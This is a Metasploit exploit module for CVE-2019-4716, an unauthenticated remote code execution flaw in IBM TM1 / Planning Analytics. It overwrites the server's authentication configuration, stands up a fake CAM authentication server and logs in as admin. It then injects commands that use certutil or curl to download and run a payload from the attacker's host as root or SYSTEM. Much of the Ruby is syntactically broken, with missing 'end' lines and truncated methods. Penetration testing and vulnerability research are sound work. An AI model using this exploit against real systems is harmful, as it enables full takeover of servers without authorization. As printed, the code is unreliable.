# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
      'Name'           => "IBM TM1 / Planning Analytics Unauthenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability in IBM TM1 / Planning Analytics that allows
        an unauthenticated attacker to perform a configuration overwrite.
        It starts by querying the Admin server for the available applications, picks one,
        and then exploits it. You can also provide an application name to bypass this step,
        and exploit the application directly.
        The configuration overwrite is used to change an application server authentication
        method to "CAM", a proprietary IBM auth method, which is simulated by the exploit.
        The exploit then performs a fake authentication as admin, and finally abuses TM1
        scripting to perform a command injection as root or SYSTEM.
        Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux.
        Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions
        earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014).
      'License'        => MSF_LICENSE,
      'Author'         =>
          'Pedro Ribeiro <pedrib@gmail.com>',
                # Vulnerability discovery and Metasploit module
          'Gareth Batchelor <gbatchelor@cloudtrace.com.au>'
                # Real world exploit testing and feedback
      'References'     =>
          [ 'CVE', '2019-4716' ],
          [ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ]
      'Targets'        =>
          [ 'Windows',
              'Platform'  => 'win',
              'Arch'      => [ARCH_X86, ARCH_X64]
          [ 'Windows (Command)',
              'Platform'  => 'win',
              'Arch'      => [ARCH_CMD],
              'Payload'   =>
                # Plenty of bad chars in Windows... there might be more lurking
                'BadChars'  => "\x25\x26\x27\x3c\x3e\x7c",
          [ 'Linux',
              'Platform'  => 'linux',
              'Arch'      => [ARCH_X86, ARCH_X64]
          [ 'Linux (Command)',
              'Platform'  => 'unix',
              'Arch'      => [ARCH_CMD],
              'Payload'   =>
                # only one bad char in Linux, baby! (that we know of...)
                'BadChars'  => "\x27",
          [ 'AIX (Command)',
              # This should work on AIX, but it was not tested!
              'Platform'  => 'unix',
              'Arch'      => [ARCH_CMD],
              'Payload'   =>
                # untested, but assumed to be similar to Linux
                'BadChars'  => "\x27",
      'Stance'        => Msf::Exploit::Stance::Aggressive,
          # we need this to run in the foreground
      'DefaultOptions'  =>
          # give the target lots of time to download the payload
          'WfsDelay' => 30,
      'Privileged'     => true,
      'DisclosureDate' => "Dec 19 2019",
      'DefaultTarget'  => 0))
        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
    register_advanced_options [
      OptString.new('APP_NAME', [false, 'Name of the target application']),
      OptInt.new('AUTH_ATTEMPTS', [true, "Number of attempts to auth to CAM server", 10]),

  ## Packet structure start
  # these are client message types
    :auth => [ 0x0, 0x1 ],
    :auth_uniq => [ 0x0, 0x3 ],
    :auth_1001 => [ 0x0, 0x4 ],
    :auth_cam_pass => [ 0x0, 0x8 ],
    :auth_dist => [ 0x0, 0xa ],
    :obj_register => [ 0, 0x21 ],
    :obj_prop_set => [ 0, 0x25 ],
    :proc_create => [ 0x0, 0x9c ],
    :proc_exec => [ 0x0, 0xc4 ],
    :get_config => [ 0x1, 0x35 ],
    :upd_clt_pass => [ 0x1, 0xe2 ],
    :upd_central => [ 0x1, 0xae ],

  # packet header is universal for both client and server
  PKT_HDR = [ 0, 0, 0xff, 0xff ]

  # pkt end marker (client only, server responses do not have it)
  PKT_END = [ 0xff, 0xff ]

  # empty auth object, used for operations that do not require auth
  AUTH_OBJ_EMPTY = [ 5, 3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ]

  # This is actually the client version number
  # 0x6949200 = 110400000 in decimal, or version 11.4
  # The lowest that version 11.4 seems to accept is 8.4, so leave that as the default
  # 8.4 = 0x4CACE80
  # 9.1 = 0x55ED120
  # 9.4 = 0x5636500
  # 10.1 = 0x5F767A0
  # 10.4 = 0x5FBFB80
  # 11.1 = 0x68FFE20
  # 11.4 = 0x6949200
  # If something doesn't work, try using one of the values above, but bear in mind this module
  # was tested on 10.2.2 and 11.4,
  VERSION = [ 0x03, 0x04, 0xca, 0xce, 0x80 ]
  ## Packet structure end

  ## Network primitives start
  # unpack a string (hex string to array of bytes)
  def str_unpack(str)
    arr = []
    str.scan(/../).each do |b|
      arr += [b].pack('H*').unpack('C*')

  # write strings directly to socket; each 2 string chars are a byte
  def sock_rw_str(sock, msg_str)
    sock_rw(sock, str_unpack(msg_str))

  # write array to socket and get result
  # wait should also be implemented in msf
  def sock_rw(sock, msg, ignore = false, wait = 0)
    if not ignore
      recv_sz = sock.read(2).unpack('H*')[0].to_i(16)
      bytes = sock.read(recv_sz-2).unpack('H*')[0]

  def sock_r(sock)
    recv_sz = sock.read(2).unpack('H*')[0].to_i(16)
    bytes = sock.read(recv_sz-2).unpack('H*')[0]

  def get_socket(app_host, app_port, ssl = 0)
      ctx = { 'Msf' => framework, 'MsfExploit' => self }
      sock = Rex::Socket.create_tcp(
        { 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 }
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
      sock.close if sock
    if sock.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the chosen application')
    if ssl == 1
      # also need to add support for old ciphers
      ctx = OpenSSL::SSL::SSLContext.new
      ctx.min_version = OpenSSL::SSL::SSL3_VERSION
      ctx.security_level = 0
      ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
      s = OpenSSL::SSL::SSLSocket.new(sock, ctx)
      s.sync_close = true
      return s
    return sock
  ## Network primitives end

  ## Packet primitives start
  def pack_sz(sz)

  # build a packet, ready to send
  def pkt_build(msg_type, auth_obj, contents)
    pkt = PKT_HDR + msg_type + auth_obj + contents + PKT_END
    pack_sz(pkt.length + 2) + pkt

  # extracts the first object from a server response
  def obj_extract(res)
    arr = str_unpack(res)

    # ignore packet header (4 bytes)
    if arr[0] == 5
      # this is an object, get the type (1 byte) plus the object bytes (9 bytes)
      obj = Array.new
      obj = arr[0..9]

  # adds a string to a packet
  # C string = 0x2; utf string = 0xe; binary = 0xf
  def stradd(str, type = 0xe)
    arr = [ type ]                 # string type
    arr += pack_sz(str.length)
    arr += str.unpack('C*')

  # packs binary data into an array
  def datapack(data)
    arr = []
    data.chars.each do |d|
      arr << d.ord

  def binadd(data)
    arr = [ 0xf ]                     # binary type 0xf
    arr += pack_sz(data.length)       # 2 byte size
    arr += datapack(data)             # ... and add the data

  def get_str(data)
    s = ""
    while data[0] != '"'.ord
    while data[0] != '"'.ord
      s += data[0].chr
    # comma

  # This fetches the current IntegratedSecurityMode from a packet such as
  # 0000ffff070000000203000000 01 07000000020e00000e0000                  (1)
  # 0000ffff070000000203000000 02 07000000020e00000e00084b65726265726f73  (2)
  # 0000ffff070000000203000000 06 07000000010e0000                        (6)
  def get_auth(data)
    # make it into an array
    data = str_unpack(data)
    if data.length > 13
      # skip 13 bytes (header + array indicator + index indicator)
      # fetch the auth method byte

  def update_auth(auth_method, restore = false)
    # first byte of data is ignored, so add an extra space
    if restore
      srv_config = " IntegratedSecurityMode=#{auth_method}"
      # To enable CAM server authentication over SSL, the CAM server certificate has to be previously
      # imported into the server. Since we can't do this, disable SSL in the fake CAM.
      srv_config = " IntegratedSecurityMode=#{auth_method}\n" +
        "ServerCAMURI=http://#{srvhost}:#{srvport}\n" +
        "ServerCAMURIRetryAttempts=10\nServerCAMIPVersion=ipv4\n" +

    arr =
      [ 3 ] + [ 0, 0, 0, 2 ] +                             # no idea what this index is
      [ 3 ] + [ 0, 0, 0, 2 ] +                             # same here
      [ 3 ] + [ 0 ] * 4 +                                  # same here
      stradd(rand_text_alpha(5..12)) +                     # same here...
      stradd("tm1s_delta.cfg") +                           # update file name
      binadd(srv_config) +                                 # file data
      stradd(rand_text_alpha(0xf))                         # last sync timestamp, max len 0xf

    upd_auth = pkt_build(
      [ 7 ] +                                   # array type
      [ 0, 0, 0, 7 ] +                          # array len (fixed size of 7 for this pkt)

  ## Packet primitives end

  ## CAM HTTP functions start
  def on_request_uri(cli, request)
    xml_res = %{<?xml version="1.0" encoding="UTF-8"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="http://developer.cognos.com/schemas/dataSourceCommandBlock/1/" xmlns:bus="http://developer.cognos.com/schemas/bibus/3/" xmlns:cm="http://developer.cognos.com/schemas/contentManagerService/1" xmlns:ns10="http://developer.cognos.com/schemas/indexUpdateService/1" xmlns:ns11="http://developer.cognos.com/schemas/jobService/1" xmlns:ns12="http://developer.cognos.com/schemas/metadataService/1" xmlns:ns13="http://developer.cognos.com/schemas/mobileService/1" xmlns:ns14="http://developer.cognos.com/schemas/monitorService/1" xmlns:ns15="http://developer.cognos.com/schemas/planningAdministrationConsoleService/1" xmlns:ns16="http://developer.cognos.com/schemas/planningRuntimeService/1" xmlns:ns17="http://developer.cognos.com/schemas/planningTaskService/1" xmlns:ns18="http://developer.cognos.com/schemas/reportService/1" xmlns:ns19="http://developer.cognos.com/schemas/systemService/1" xmlns:ns2="http://developer.cognos.com/schemas/agentService/1" xmlns:ns3="http://developer.cognos.com/schemas/batchReportService/1" xmlns:ns4="http://developer.cognos.com/schemas/dataIntegrationService/1" xmlns:ns5="http://developer.cognos.com/schemas/dataMovementService/1" xmlns:ns6="http://developer.cognos.com/schemas/deliveryService/1" xmlns:ns7="http://developer.cognos.com/schemas/dispatcher/1" xmlns:ns8="http://developer.cognos.com/schemas/eventManagementService/1" xmlns:ns9="http://developer.cognos.com/schemas/indexSearchService/1">
    <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <result baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]">

    session =
    %Q{   <item xsi:type="bus:session">
              <value baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]">
                <item xsi:type="bus:account">

    account =
    %Q{   <item xsi:type="bus:account">

    headers = { "SOAPAction" => '"http://developer.cognos.com/schemas/contentManagerService/1"'}
    if request.body.include? "<searchPath>/</searchPath>"
      print_good("CAM: Received first CAM query, responding with account info")
      response = xml_res.sub('PLACEHOLDER', account)
    elsif request.body.include? "<searchPath>~~</searchPath>"
      print_good("CAM: Received second CAM query, responding with session info")
      response = xml_res.sub('PLACEHOLDER', session)
    elsif request.body.include? "<searchPath>admin</searchPath>"
      print_good("CAM: Received third CAM query, responding with random garbage")
      response = rand_text_alpha(5..12)
    elsif request.method == "GET"
      print_good("CAM: Received request for payload executable, shell incoming!")
      response = @pl
      headers = { "Content-Type" => "application/octet-stream" }
      response = ''
      print_error("CAM: received unknown request")
    send_response(cli, response, headers)
  ## CAM HTTP functions end

  def restore_auth(app, auth_current)
    print_status("Restoring original authentication method #{auth_current}")
    upd_cent = update_auth(auth_current, true)
    s = get_socket(app[2], app[3], app[5])
    sock_rw(s, upd_cent, true)

  def exploit
    # first let's check if SRVHOST is valid
    if datastore['SRVHOST'] == ""
      fail_with(Failure::Unknown, "Please enter a valid IP address for SRVHOST")

    # The first step is to query the administrative server to see what apps are available.
    # This action can be done unauthenticated. We then list all the available app servers
    # and pick a random one that is currently accepting clients. This step is important
    # not only to know what app servers are available, but also to know if we need to use
    # SSL or not.
    # The admin server is usually at 5498 using SSL. Non-SSL access is disabled by default, but when enabled, it's available at port 5495
    # Step 1: fetch the available applications / servers from the Admin server
    # ... if the user did not enter an APP_NAME
    if datastore['APP_NAME'].nil?
      print_status("Connecting to admin server and obtaining application data")

      # for this packet we use string type 0xc (?) and cut off the PKT_END
      pkt_control = PKT_HDR + [0] + stradd(lhost, 0xc)
      pkt_control = pack_sz(pkt_control.length + 2) + pkt_control
      data = sock_rw(sock, pkt_control)

      if data
        # now process the response
        apps = []

        data = str_unpack(data)

        # ignore packet header (4 bytes)

        # now just go through the list we received, sample format below
        # "24retail","tcp","","17414","1460","1",",,","1","0","","","","0","","0","","ipv4","22","0","2","http://centos7.doms.com:8014","8014"
        # "GO_New_Stores","tcp","","45557","1460","0",",,","1","1","","","","0","","0","","ipv4","23","0","2","https://centos7.doms.com:5010","5010"
        # "GO_Scorecards","tcp","","44321","1460","0",",,","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:44312","44312"
        # "Planning Sample","tcp","","12345","1460","0",",,","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:12354","12354"
        # "proven_techniques","tcp","","53333","1460","0",",,","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:5011","5011"
        # "SData","tcp","","12346","1460","0",",,","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:8010","8010"
        while data != nil and data.length > 2
          # skip the marker (0x0, 0x5) that indicates the start of a new app
          data = data[2..-1]

          # read the size and fetch the data
          size = (data[0..1].pack('C*').unpack('H*')[0].to_i(16))
          data_next = data[2+size..-1]
          data = data[2..size]

          # first is application name
          app_name = get_str(data)

          # second is protocol, we don't care
          proto = get_str(data)

          # third is IP address
          ip = get_str(data)

          # app port
          port = get_str(data)

          # mtt maybe? don't care
          mtt = get_str(data)

          # not sure, and don't care
          unknown = get_str(data)

          # localhost addresses? again don't care
          unknown_addr = get_str(data)

          # I think this is the accepting clients flag
          accepts = get_str(data)

          # and this is a key one, the SSL flag
          ssl = get_str(data)

          # the leftover data is related to the REST API *I think*, so we just ignore it

          print_good("Found app #{app_name} #{proto} ip: #{ip} port: #{port} available: #{accepts} SSL: #{ssl}")
          apps.append([app_name, proto, ip, port.to_i, accepts.to_i, ssl.to_i])

          data = data_next
        fail_with(Failure::Unknown, 'Failed to obtain application data from the admin server')

      # now pick a random application server that is accepting clients via TCP
      app = apps.sample
      total = apps.length
      count = 0

      # TODO: check for null return here, and probably also response size > 0x20
      while app[1] != "tcp" and app[4] != 1 and count < total
        app = apps.sample
        count += 1

      if count == total
        fail_with(Failure::Unknown, 'Failed to find an application we can attack')
      print_status("Picked #{app[0]} as our target, connecting...")

      # else if the user entered an APP_NAME, build the app struct with that info
      ssl = datastore['SSL']
      app = [datastore['APP_NAME'], 'tcp', rhost, rport, 1, (ssl ? 1 : 0)]
      print_status("Attacking #{app[0]} on #{peer} as requested with TLS #{ssl ? "on" : "off"}")

    s = get_socket(app[2], app[3], app[5])

    # Step 2: get the current app server configuration variables, such as the current auth method used
    get_conf = stradd(app[0])
    get_conf += VERSION
    auth_get = pkt_build(MSG_TYPES[:get_config], AUTH_OBJ_EMPTY, get_conf)
    data = sock_rw(s, auth_get)
    auth_current = get_auth(data)

    print_good("Current auth method is #{auth_current}, we're good to go!")

    # Step 3: start the fake CAM server / exploit server
    if payload.arch.include? ARCH_CMD
      @pl = ''
      @pl = generate_payload_exe

    # do not use SSL for the CAM server!
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false

    print_status("Starting up the fake CAM server...")
        'Uri' => {
          'Proc' => Proc.new { |cli, req|
            on_request_uri(cli, req)
          'Path' => '/'
    datastore['SSL'] = true if ssl_restore

    # Step 4: send the server config update packet, and ignore what it sends back
    print_status("Changing authentication method to 4 (CAM auth)")
    upd_cent = update_auth(4)
    s = get_socket(app[2], app[3], app[5])
    sock_rw(s, upd_cent, true)

    # Step 5: send the CAM auth request and obtain the authentication object
    # app name
    auth_pkt = stradd(app[0])

    auth_pkt += [ 0x7, 0, 0, 0, 3 ]                           # array with 3 objects

    # passport, can be random
    auth_pkt += stradd(rand_text_alpha(5..12))

    # no idea what these vars are, but they don't seem to matter
    auth_pkt += stradd(rand_text_alpha(5..12))
    auth_pkt += stradd(rand_text_alpha(5..12))

    # client IP
    auth_pkt += stradd(lhost)

    # add the client version number
    auth_pkt += VERSION

    auth_dist = pkt_build(MSG_TYPES[:auth_cam_pass], AUTH_OBJ_EMPTY, auth_pkt)

    print_status("Authenticating using CAM Passport and our fake CAM Service...")
    s = get_socket(app[2], app[3], app[5])

    # try to authenticate up to AUTH_ATTEMPT times, but usually it works the first try
    # adjust the 4th parameter to sock_rw to increase the timeout if it's not working and / or the CAM server is on another network
    counter = 1
    res_auth = ''
    while(counter < datastore['AUTH_ATTEMPTS'])
      # send the authenticate request, but wait a bit so that our fake CAM server can respond
      res_auth = sock_rw(s, auth_dist, false, 0.5)
      if res_auth.length < 20
        print_error("Failed to authenticate on attempt number #{counter}, trying again...")
        counter += 1
    if counter == datastore['AUTH_ATTEMPTS']
      # if we can't auth, bail out, but first restore the old auth method
      #restore_auth(app, auth_current)
      fail_with(Failure::Unknown, "Failed to authenticate to the Application server. Run the exploit and try again!")

    auth_obj = obj_extract(res_auth)

    # Step 6: create a Process object
    print_status("Creating our Process object...")
    proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:proc_create], auth_obj, [])))

    if payload.arch == ["cmd"]
      cmd_one = payload.encoded
      cmd_two = ''
      payload_url = "http://#{srvhost}:#{srvport}/"
      exe_name = rand_text_alpha(5..13)
      if target['Platform'] == 'win'
        # the Windows command has to be split amongst two lines; the & char cannot be used to execute two processes in one line
        exe_name += ".exe"
        exe_name = "C:\\Windows\\Temp\\" + exe_name
        cmd_one = "certutil.exe -urlcache -split -f #{payload_url} #{exe_name}"
        cmd_two = exe_name
        # the Linux one can actually be done in one line, but let's make them similar
        exe_name = "/tmp/" + exe_name
        cmd_one = "curl #{payload_url} -o #{exe_name};"
        cmd_two = "chmod +x #{exe_name}; exec #{exe_name}"


    proc_cmd =
      [ 0x3, 0, 0, 2, 0x3c ] +                        # no idea what this index is
      [ 0x7, 0, 0, 0, 2 ] +                           # array with 2 objects (2 line script)
    # the first argument is the command
    # the second whether it should wait (1) or not (0) for command completion before returning
      stradd("executecommand('#{cmd_one}', #{cmd_two.empty? ? "0" : "1"});") +
      stradd("executecommand('#{cmd_two}', 0);")

    # Step 7: add the commands into the process object
    print_status("Adding command: \"#{cmd_one}\" to the Process object...")
    if cmd_two != ''
      print_status("Adding command: \"#{cmd_two}\" to the Process object...")
    sock_rw(s, pkt_build(MSG_TYPES[:obj_prop_set], [], proc_obj + proc_cmd))

    # Step 8: register the Process object with a random name
    obj_name = rand_text_alpha(5..12)
    print_status("Registering the Process object under the name '#{obj_name}'")
    proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:obj_register], auth_obj, proc_obj + stradd(obj_name))))

    # Step 9: execute the Process!
    print_status("Now let's execute the Process object!")
    sock_rw(s, pkt_build(MSG_TYPES[:proc_exec], [], proc_obj + [ 0x7 ] + [ 0 ] * 4), true)

    # Step 10: restore the auth method and enjoy the shell!
    restore_auth(app, auth_current)

    if payload.arch.include? ARCH_CMD
      print_good("Your command should have executed by now, enjoy!")